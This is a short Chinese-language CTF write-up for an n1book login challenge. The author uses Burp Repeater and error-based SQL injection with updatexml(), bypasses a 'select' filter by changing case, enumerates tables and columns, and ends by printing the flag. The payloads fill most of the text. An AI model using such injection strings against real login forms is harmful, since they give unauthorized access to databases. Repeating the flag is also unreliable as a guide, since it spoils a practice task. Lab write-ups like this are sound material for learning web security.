题目让访问这俩,那就冲
请访问 /login.php /user.php
先去第一个看看
进来啥也没有,就一个登录界面
养成F12好习惯
喜提小tip一个
好了该抓包抓包
发给 repeater
在/login.php的后边加上?tips=1,send看看现象
msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"
msg是这玩意,拿给百度看看,
是Unicode
使用这个试试name=1'and updatexml(1,concat(0x7e,(select 1 from dual)),1)--+&pass=xxxx
发现select被过滤了
试试大小写绕过
name=1'and updatexml(1,concat(0x7e,(sELECT 1 from dual)),1)--+&pass=1' and 1=2 --+
成功得到正常回显,证明可行
接下来可以尝试查表名了
name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+&pass=1' and 1=2 --+
咦,熟悉的f长得像flag东西,去看看 ,获取其字段
name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(column_name) from information_schema.columns where table_name='fl4g')),1)--+&pass=1' and 1=2 --+
最后查看字段获取flag
name=1'and updatexml(1,concat(0x7e,(sELECT flag from fl4g)),1)--+&pass=1' and 1=2 --+
n1book{login_sqli_is_nice}